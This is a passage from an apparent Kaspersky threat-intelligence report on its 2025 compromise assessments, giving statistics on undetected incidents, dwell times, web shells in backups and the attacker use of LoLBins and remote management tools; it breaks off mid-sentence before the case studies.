Missed incidents, persistent threats, and response gaps: Insights from compromise assessment projects
Kaspersky's 2025 compromise assessments reveal missed incidents, persistent threats, and response gaps.
Summary
Kaspersky's 2025 compromise assessment findings highlight significant trends in undetected threats, with 60% of incidents missed due to lack of high-confidence alerts. Nearly a third of detected incidents persisted for over three months, and the oldest discovered threat had been active for four years. The analysis also points to the reliance of threat actors on LoLBins and remote management tools, and the critical need for continuous monitoring and proactive threat hunting to mitigate high-severity compromises.
Full text
Table of Contents Key trends observed during compromise assessment engagementsAbout the Kaspersky Compromise Assessment serviceDetection logic familiesReasons for requesting Kaspersky Compromise Assessment servicesCase study: Dormant threat uncovered only by a compromise assessmentMissed long-term incidentsCase study: Four-year-old crypto mining activity on domain controllersUnintentional malware preservationLegitimate, yet suspicious: LoLBins and remote management toolsImpact of not having continuous monitoring and proactive threat huntingCase study: Secure by design without continuous monitoringIncident response action statisticsWhy forensic collection is the default entry pointContainment: The remove files/registry keys paradoxCommunication failures: An additional operational overheadThe iterative nature of response plan updatesDistinguishing real attacker artifacts from penetration testing leftoversIncident response maturity and its effect on severityCase study: In-memory LionTail infection on critical Windows serversSolving the root cause problemsCommon observations on root causesLack of detections: Causes and impactsCase study: In-memory PurpleFox infection evades conventional endpoint protectionInsufficient vulnerability management: A catalyst for high-severity compromisesCase study: How overly permissive GPO-based software distribution goes wrongConclusion Authors Victor Sergeev Amged Wageh The following analysis presents the key findings from Kaspersky Compromise Assessment engagements performed in 2025. A compromise assessment is an independent, expert-driven service that examines whether a target network has been compromised. The service combines threat intelligence analysis (including darknet sources), tool-aided endpoint scanning, a systematic review of security event logs and network traffic, and, when necessary, an initial incident response and digital forensic investigation. This report focuses on missed incidents – threats that remained undetected for weeks, months, or even years. Key trends observed during compromise assessment engagements Proactive compromise assessment decreases the number of missed high-severity incidents. The highest proportions of high-severity incidents were revealed in organizations that requested our compromise assessment service after containing a known incident. The lowest proportions of high-severity incidents were observed in organizations that conducted regular audits. Of all the incidents discovered, 20% were found manually, while enterprises missed 60% because of the absence of high-confidence alerts from the tools in place. Nearly a third of discovered incidents took over three months to detect. The longer a threat persisted in the target environment, the greater the likelihood that an incident would be severe. 30.8% of incidents had activity spanning over three months, with 52% of high-severity compromises discovered only after 90 days of going undetected. The oldest incident discovered in 2025 had gone undetected for four years. Malicious files often remain in backups and are restored after incident response activities. 40% of all discovered web shells resided in backups and went unnoticed until a proper compromise assessment was conducted. Threat actors rely on remote management tools and LoLBins. These types of tools were found in all compromise assessment engagements that resulted in an incident detection. Monitoring tools and controls are not self-sufficient; operational maturity makes the difference. Monitoring tools must be configured and adapted to the changing threat landscape. Furthermore, human analysts need to review low-confidence alerts. A lack of continuous monitoring and threat hunting activities increased the likelihood of high- and medium-severity incidents to 84–86%. At the same time, high‑severity incidents were rare among organizations with in-house capabilities to reverse-engineer malware. Communication issues lead to missed incidents. Nearly a third of the compromise assessments revealed communication issues that impacted incident response activities. The incident response playbook is not set in stone. For incident response to be efficient and effective, playbooks must be updated as new artifacts are discovered. Treating the incident response plan as a living document reduces the risk of missing threats. About the Kaspersky Compromise Assessment service Our global compromise assessment portfolio spans several regions. In 2025, around 71% of the incidents we identified affected our customers in the META region, while the APAC and CIS regions accounted for the remaining 29%. Geographic distribution of incidents identified during Kaspersky Compromise Assessment projects in 2025 (download) Our service was requested by organizations from a diverse set of sectors. The government sector accounted for around 29% of incidents, followed by the education (19%) and financial (17%) sectors. Distribution of economy sector incidents identified during Kaspersky Compromise Assessment projects in 2025 (download) Detection logic families Our compromise assessments operate on a continuously updated catalogue of indicators of attack (IoAs). Because the raw set of IoAs is too granular for high-level reporting, we map them to a concise set of detection logic families. The statistics indicate that three detection families dominate the incident mix: Credentials from dumps: 12.4% of all incidents; Specific living-off-the-land (LOTL) tools: 11.2 %; Specific malware families: 11.2 %. These three detection logic families represent high-fidelity indicators of attack that reliably signal infrastructure compromises ranging from dormant, disk-based malware to persistent and multi-stage attacks. Distribution of detection logic families (download) Reasons for requesting Kaspersky Compromise Assessment services Analysis of our compromise assessment engagements that took place in 2025 reveals a clear correlation between the stated purpose of the engagement and the risk profile of the findings. General audits dominate the portfolio with 56% of requests, followed by authority reporting engagements (19%), post-incident checkups (17%), and acquisitions (9%). Statistics on the reasons behind CA project requests (download) When the findings are classified by severity, the post-incident checkup category exhibits the highest proportion of high-severity incidents (40.7%). The full breakdown is shown below. Incident severity breakdown by service engagement reason Incident severity (%) High Medium Low Reason for service Acquiring new company 28.6 42.8 28.6 General audit 27.7 36.7 35.6 Report to an authority 30 46.7 23.3 Checkup after a cybersecurity incident 40.7 25.9 33.4 Post-incident checkups are frequently initiated after an initial incident response (IR) effort. The elevated share of high-severity findings suggests that IR activities, which are typically limited to containing a known incident, do not provide a complete view of the broader environment. Consequently, other threats may remain undetected until a full compromise assessment is performed. Merger and acquisition-related assessments are proactive assessments performed when a company acquires another entity. This involves the target’s network being scanned for hidden threats before the two environments are merged. These assessments demonstrate a balanced distribution of severity: 28.6% low-severity, 42.8% medium-severity, and 28.6 % high-severity. This reflects the mixed risk posture of target environments of acquisitions, which are often evaluated for both known vulnerabilities and hidden malicious activity. Similarly, other proactive approaches like general audit assessments or assessments driven by the need to regularly submit a compliance report to a regulatory authority, share almost the same ratio. This indicates that regular, proactive and compliance-oriented assessments tend to reveal substantive issues earlier in the attack lifecycle, reducing the lik
Indicators of Compromise
- malware — PurpleFox
- malware — LionTail